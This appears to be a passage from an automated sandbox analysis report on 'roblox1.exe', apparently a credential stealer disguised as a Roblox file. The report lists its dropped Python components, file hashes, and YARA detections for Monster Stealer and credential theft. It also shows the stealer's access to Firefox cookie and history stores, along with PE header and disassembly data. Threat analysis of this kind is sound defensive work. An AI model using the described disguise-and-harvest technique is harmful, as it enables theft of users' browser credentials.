                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.o...o...o.......m.......b.......c.......g.......k...f.`.u......f...o...3..............n.......n.......n...Richo...................PE..d....K.b.........." ... ..#...!.....|!........................................E.....{.D...`..........................................G=.......>.|.....E.......B......hD..)....E..t...Q%.T...........................`P%.@.............#.0............................text.....#.......#................. ..`.rdata...\....#..^....#.............@..@.data... ....0>.......>.............@....pdata........B.. ....A.............@..@PyRuntim`.....D.......C.............@....rsrc.........E.......C.............@..@.reloc...t....E..v....C.............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\select.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29096
                                                                                                                                                                                                                                  Entropy (8bit):6.4767692602677815
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rPxHeWt+twhCBsHqF2BMXR6VIS7GuIYiSy1pCQkyw24i/8E9VFL2Ut8JU:ZeS+twhC6HqwmYVIS7GjYiSyv7VeEdH
                                                                                                                                                                                                                                  MD5:ADC412384B7E1254D11E62E451DEF8E9
                                                                                                                                                                                                                                  SHA1:04E6DFF4A65234406B9BC9D9F2DCFE8E30481829
                                                                                                                                                                                                                                  SHA-256:68B80009AB656FFE811D680585FAC3D4F9C1B45F29D48C67EA2B3580EC4D86A1
                                                                                                                                                                                                                                  SHA-512:F250F1236882668B2686BD42E1C334C60DA7ABEC3A208EBEBDEE84A74D7C4C6B1BC79EED7241BC7012E4EF70A6651A32AA00E32A83F402475B479633581E0B07
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{?t..Q'..Q'..Q'.b.'..Q'.`P&..Q'.`T&..Q'.`U&..Q'.`R&..Q'.`P&..Q'..P'..Q'5hP&..Q'.`\&..Q'.`Q&..Q'.`.'..Q'.`S&..Q'Rich..Q'........................PE..d....K.b.........." ... .....2......................................................l.....`..........................................@..L....@..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata..H....0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\sqlite3.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1445800
                                                                                                                                                                                                                                  Entropy (8bit):6.579172773828651
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:tU3g/eNVQHzcayG7b99ZSYR4eXj98nXMuVp+qbLKeq98srCIS:ck3hbEAp8X9Vp+2q2gI
                                                                                                                                                                                                                                  MD5:926DC90BD9FAF4EFE1700564AA2A1700
                                                                                                                                                                                                                                  SHA1:763E5AF4BE07444395C2AB11550C70EE59284E6D
                                                                                                                                                                                                                                  SHA-256:50825EA8B431D86EC228D9FA6B643E2C70044C709F5D9471D779BE63FF18BCD0
                                                                                                                                                                                                                                  SHA-512:A8703FF97243AA3BC877F71C0514B47677B48834A0F2FEE54E203C0889A79CE37C648243DBFE2EE9E1573B3CA4D49C334E9BFE62541653125861A5398E2FE556
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|{.............e.......g.......g.......g.......g......Po...............g.......g.......g.....g......Rich............PE..d....L.b.........." ... ..................................................... .......`....`..............................................!...................0...........)......|...Pg..T............................f..@............ ..(............................text............................... ..`.rdata..D.... ......................@..@.data...0A.......8..................@....pdata.......0......................@..@.rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16927744
                                                                                                                                                                                                                                  Entropy (8bit):6.302956053733049
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:98304:q1AOB/8NakwZBOCjzAI3WtPV+SBMmL5kPAcEpbfNuHb9BwPmBPwYqMx7dF5C/qqS:q1AlAkDw/s05IrNpdc0
                                                                                                                                                                                                                                  MD5:6FE46FD6E5B143F5114E6616C59B703C
                                                                                                                                                                                                                                  SHA1:D7EC21B14605DEDB9FA17FE94FDD4F38F27E46DD
                                                                                                                                                                                                                                  SHA-256:5DE7D49690EDDFC6C109081D498ECAE18EDB6D980A7380C05B0AADE16A75D09A
                                                                                                                                                                                                                                  SHA-512:B339DF96044A205713BFF7E5B7341233017697966C69D26B8C8D9E6B216481D5401970E9AE9F2EE6285469C1DE451033F8BC3A967B10657226665D4472B46250
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_MonsterStealer, Description: Yara detected Monster Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, Author: Joe Security
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Jg...............+.....H......%..........@.........................................`.....................................................49.....8.R......G.......................................... N..(.......................(............................text...X...........................`..`.data...0....0....... ..............@....rdata..............................@..@.eh_fram.............|..............@....pdata...G.......H...~..............@..@.xdata.............................@..@.bss.....................................idata..49.......:...z..............@....CRT....`..........................@....tls...............................@....rsrc...8.R......R.................@..@.reloc...............@..............@..B................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\unicodedata.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1121192
                                                                                                                                                                                                                                  Entropy (8bit):5.384501252071814
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:bMYYMmuZ63NoQCb5Pfhnzr0ql8L8koM7IRG5eeme6VZyrIBHdQLhfFE+uz9O:AYYuXZV0m8wMMREtV6Vo4uYz9O
                                                                                                                                                                                                                                  MD5:102BBBB1F33CE7C007AAC08FE0A1A97E
                                                                                                                                                                                                                                  SHA1:9A8601BEA3E7D4C2FA6394611611CDA4FC76E219
                                                                                                                                                                                                                                  SHA-256:2CF6C5DEA30BB0584991B2065C052C22D258B6E15384447DCEA193FDCAC5F758
                                                                                                                                                                                                                                  SHA-512:A07731F314E73F7A9EA73576A89CCB8A0E55E53F9B5B82F53121B97B1814D905B17A2DA9BD2EDA9F9354FC3F15E3DEA7A613D7C9BC98C36BBA653743B24DFC32
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(..F...F...F......F..G...F..C...F..B...F..E...F...G...F.C.G...F...G...F...K...F...F...F.......F...D...F.Rich..F.........................PE..d....K.b.........." ... .B...........*.......................................@......Y.....`.............................................X...(........ ...................)...0......@b..T............................a..@............`..x............................text....A.......B.................. ..`.rdata......`.......F..............@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\vcruntime140.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):98736
                                                                                                                                                                                                                                  Entropy (8bit):6.474996871326343
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                                                                                                  MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                                                                                                  SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                                                                                                  SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                                                                                                  SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_helpers_c.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):54784
                                                                                                                                                                                                                                  Entropy (8bit):5.745430306227729
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:luW10HHYD8RU55Wo0YixccXdyNkj32cf4p9hQQv5QbxiXjoltOanMvydo:lueEHBMIo0ZxcEyNOn4/+iXjYMvy
                                                                                                                                                                                                                                  MD5:6FB550DDAEE31AFEDD29BDB97E2525F2
                                                                                                                                                                                                                                  SHA1:B58257F37C581F143176D0C7ABD3A98FEC75A12F
                                                                                                                                                                                                                                  SHA-256:33A9B6F1CAEDE0DBC9EE83097DEA21C6DB0A5CABFF27F2917EA94CF47688E9DF
                                                                                                                                                                                                                                  SHA-512:DBEB69892C63238AEA76422815E45B7B1E12A7D2A0BCC6170F690B68EB56BC04C071413885FCE81CC6CE435D9C60C36D9B97C792C75C21541DB612C48124DF38
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o.Z.............v?..............v..............................f{...........................S...........Rich............................PE..d....X.f.........." ...).....Z...............................................0............`.........................................`...d.......d...............,............ ......`............................... ...@............................................text............................... ..`.rdata...8.......:..................@..@.data...0...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_quoting_c.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):95744
                                                                                                                                                                                                                                  Entropy (8bit):5.981540506645796
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:rcNWyKPvIOrTasrpKBbylBwq9FJwHGa6NWfJc97JxtR:4wyyvIAasrEBOwIH0GaPJc97JxtR
                                                                                                                                                                                                                                  MD5:6809491F7B8AD46A7281E222CA71745A
                                                                                                                                                                                                                                  SHA1:138C75BFB03B1D54CD62FE14C3DC4501CB418397
                                                                                                                                                                                                                                  SHA-256:80660605AE26882225D02D130D0A84927635A79C78055C2EEDE010A28E84EB32
                                                                                                                                                                                                                                  SHA-512:97B498E3F69DE6CCC4F3373683D9E2AAE67CBE2532508A7677738702BBAF02EBD7C05C26E53CEBB076F9943EEA59B1AC4B9F7EE71A1626B8E31E539D009B39E8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J..].....................;......E.......;.......;.......;.....................F:......F:......F:j.....F:......Rich............PE..d...!X.f.........." ...)..................................................................`..........................................X..d...4Y..x...............................,....G..............................PF..@............ ..`............................text............................... ..`.rdata...M... ...N..................@..@.data...@7...p.......Z..............@....pdata...............f..............@..@.rsrc................r..............@..@.reloc..,............t..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  File type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                  Entropy (8bit):7.997435059161403
                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                  • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 12.50%
                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                                                                                                                                  File name:roblox1.exe
                                                                                                                                                                                                                                  File size:11'168'256 bytes
                                                                                                                                                                                                                                  MD5:cd463d16cf57c3a9f5c9588a878a7213
                                                                                                                                                                                                                                  SHA1:ef22c2b11efc0bc6a739b82f9a26edaee9348b8f
                                                                                                                                                                                                                                  SHA256:49f4789274e5c0dcd4d2cc1b850761353bf8b72e819d12df5c376fd665da1283
                                                                                                                                                                                                                                  SHA512:5b20ce36b15f5d002d183850032067b11f811544bac19e0a76340df47294d0b059fa8dc43fedd8480d6f72eb8357d01924dbe9cbebdaac1625c5f4f498392822
                                                                                                                                                                                                                                  SSDEEP:196608:1a4vbUQYRyS/Kh44vTM1NExeka13ZlfNf5PWwShXBFPHIG1MZBwYFCnvkC2:7vDX0gZvT2U/S3ZllEhxFPIG1rYFC8C
                                                                                                                                                                                                                                  TLSH:D4B63322E24350D8D14BD0F0DA866BE2A438FCB48276D47FA382F76F6319D544BACB55
                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Jg...............+.....f...>..%..........@............................. ......VP....`... ............................

                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Entrypoint:0x140001125
                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                  Subsystem:windows cui
                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                                  Time Stamp:0x674AFD18 [Sat Nov 30 11:55:04 2024 UTC]
                                                                                                                                                                                                                                  TLS Callbacks:0x40014ca0, 0x1, 0x40014d60, 0x1
                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                  Import Hash:0cad4d75817cf5181c89bf958567a0e8

                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  sub esp, 30h
                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], 000000FFh
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov eax, dword ptr [0001E985h]
                                                                                                                                                                                                                                  mov dword ptr [eax], 00000000h
                                                                                                                                                                                                                                  call 00007F06692E2FE3h
                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                  nop
                                                                                                                                                                                                                                  nop
                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  add esp, 30h
                                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  sub esp, 70h
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov dword ptr [ebp-10h], 00000000h
                                                                                                                                                                                                                                  mov dword ptr [ebp-1Ch], 00000030h
                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-1Ch]
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov dword ptr [ebp-28h], eax
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-28h]
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov eax, dword ptr [eax+08h]
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov dword ptr [ebp-18h], eax
                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                                                  jmp 00007F06692E2FF3h
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  cmp eax, dword ptr [ebp-18h]
                                                                                                                                                                                                                                  jne 00007F06692E2FDBh
                                                                                                                                                                                                                                  mov dword ptr [ebp-04h], 00000001h
                                                                                                                                                                                                                                  jmp 00007F06692E3017h
                                                                                                                                                                                                                                  mov ecx, 000003E8h
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov eax, dword ptr [000472FEh]
                                                                                                                                                                                                                                  call eax
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov eax, dword ptr [0001E95Dh]
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov dword ptr [ebp-30h], eax
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-18h]
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov dword ptr [ebp-38h], eax
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov dword ptr [ebp-40h], 00000000h
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov ecx, dword ptr [ebp-38h]
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-40h]
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov edx, dword ptr [ebp-30h]
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  cmp dword ptr [ebp-10h], 00000000h
                                                                                                                                                                                                                                  jne 00007F06692E2F7Ah
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  mov eax, dword ptr [0001E936h]
                                                                                                                                                                                                                                  mov eax, dword ptr [eax]

                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x480000xe14.idata
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x4b0000xa853d0.rsrc
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x220000x7c8.pdata
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xad10000x90.reloc
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x1f3600x28.rdata
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x483680x318.idata
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                  .text0x10000x1b8280x1ba001455bf91ae500609df54dc39473cd02cFalse0.5004153704751131data6.3279571847761IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  .data0x1d0000x1000x200eb9a6cb228491de89417dc68d3c3e465False0.173828125data1.1472281521632943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  .rdata0x1e0000x2ab00x2c0006ba628f277d0fbdce9d69acb88071d4False0.27494673295454547data5.143379586263529IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  .eh_fram0x210000x40x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  .pdata0x220000x7c80x800264a8f496e19cc8aa452042d9082d892False0.4990234375data5.135211167390138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  .xdata0x230000x9700xa007b4256fb41288066fee448ce27d14d87False0.276171875shared library4.49993989238553IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  .bss0x240000x23c900x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  .idata0x480000xe140x1000b67a6c2d0d3709103b2f787b6c1f601aFalse0.31201171875data4.089062374830754IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  .CRT0x490000x600x20078ac47b49507f3b1f9fdfe0f61a65ad6False0.0703125data0.3164000245953951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  .tls0x4a0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  .rsrc0x4b0000xa853d00xa85400102123431f9b35cda8ef1ad8d0c6f7a3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
